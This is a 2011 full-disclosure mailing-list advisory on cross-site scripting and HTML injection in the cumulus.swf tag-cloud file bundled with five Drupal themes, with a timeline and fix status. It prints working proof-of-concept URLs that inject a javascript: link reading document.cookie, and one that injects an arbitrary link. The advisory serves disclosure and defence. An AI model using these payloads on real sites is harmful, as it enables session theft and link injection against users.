[<prev] [next>] [day] [month] [year] [list]
Message-ID: <004801cc8144$32c48180$9b7a6fd5@ml>
Date: Sun, 2 Oct 2011 23:42:10 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: "Vladimir '3APA3A' Dubrovin" <3APA3A@...URITY.NNOV.RU>,
<submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: Vulnerability in multiple themes for Drupal
Hello list!
The endless saga continue. After informing about a lot of vulnerable plugins
and widgets with this swf-file, here is information about multiple
vulnerable themes ;-).
I want to warn you about Cross-Site Scripting vulnerability in multiple
themes for Drupal. And a lot of other themes for Drupal and other engines
can be vulnerable.
This XSS is similar to XSS vulnerability in WP-Cumulus, which I've disclosed
in 2009 (http://securityvulns.com/Wdocument842.html). Because these themes
use cumulus.swf (it's the same tagcloud.swf made by author of WP-Cumulus).
About such vulnerabilities I wrote in 2009-2011, particularly about millions
of flash files tagcloud.swf which are vulnerable to XSS attacks I mentioned
in my article XSS vulnerabilities in 34 millions flash files
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-January/006033.html).
-------------------------
Affected products:
-------------------------
Vulnerable are all versions of themes Admire Grunge, Morok, Pushbutton,
Danland and Analytic for Drupal.
----------
Details:
----------
XSS (WASC-08):
http://site/themes/admire_grunge/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/morok/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/pushbutton/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/sites/all/themes/danland/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/analytic/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
Code will execute after click. It's strictly social XSS. Also it's possible
to conduct (like in WP-Cumulus) HTML Injection attack.
HTML Injection (WASC-12):
http://site/path/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
-------------------------------------------------
Fixed version of swf-file:
-------------------------------------------------
All users of these and other themes, plugins and widgets (and their
developers) with this swf-file could fix this issue but updating swf-file to
fixed version.
But as I wrote in my last advisory
(http://lists.grok.org.uk/pipermail/full-disclosure/2011-September/082656.html),
the developer of WP-Cumulus fixed only XSS vector, but not HTML Injection
vector. So it's still possible to conduct HTML Injection attacks (for
injecting arbitrary links) on all versions of this swf-file (including
version with fixed XSS hole). Which should be taken into account.
------------
Timeline:
------------
2009.11.09 - disclosed at my site about WP-Cumulus.
2009.11.11 - informed developer of WP-Cumulus.
2009.11.15 - developer of WP-Cumulus fixed XSS (but not HTML Injection).
2011.10.01 - disclosed at my site about five vulnerable themes for Drupal.
And a lot of other themes for Drupal and other engines can be vulnerable.
I mentioned about these vulnerabilities at my site:
http://websecurity.com.ua/5407/
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists